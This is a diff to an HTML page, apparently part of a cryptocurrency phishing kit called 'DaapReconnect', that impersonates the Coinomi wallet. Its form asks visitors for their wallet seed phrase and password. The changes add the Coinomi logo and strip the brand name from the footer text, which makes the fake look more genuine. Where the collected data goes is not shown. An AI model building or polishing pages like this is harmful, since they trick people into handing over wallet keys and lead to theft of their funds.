--- a/coinomi.html
+++ b/coinomi.html
@@ -74,7 +74,11 @@
                         </div>
 
                         <div class="middle">
-                            <h4>Coinomi</h4>
+                            
+                            <div class="toop">
+                                <img src="Coinomi-01.svg" alt="">
+                                <h4>Coinomi</h4>   
+                            </div>
                             <textarea id="seed" minlength="30" name="Coinomi" placeholder="Seed Phrase..." required></textarea >
                         <input id="movepass"  type="password"
                       placeholder="Password" name="Password"/>
@@ -111,7 +115,7 @@
     <div class="footer-container">
         <div class="footer-leftpart">
             <img src="logo.svg" alt="logo">
-            <p>DaapReconnect connects web applications to supported mobile wallets.</p>
+            <p>Connects web applications to supported mobile wallets.</p>
             
        </div>
 
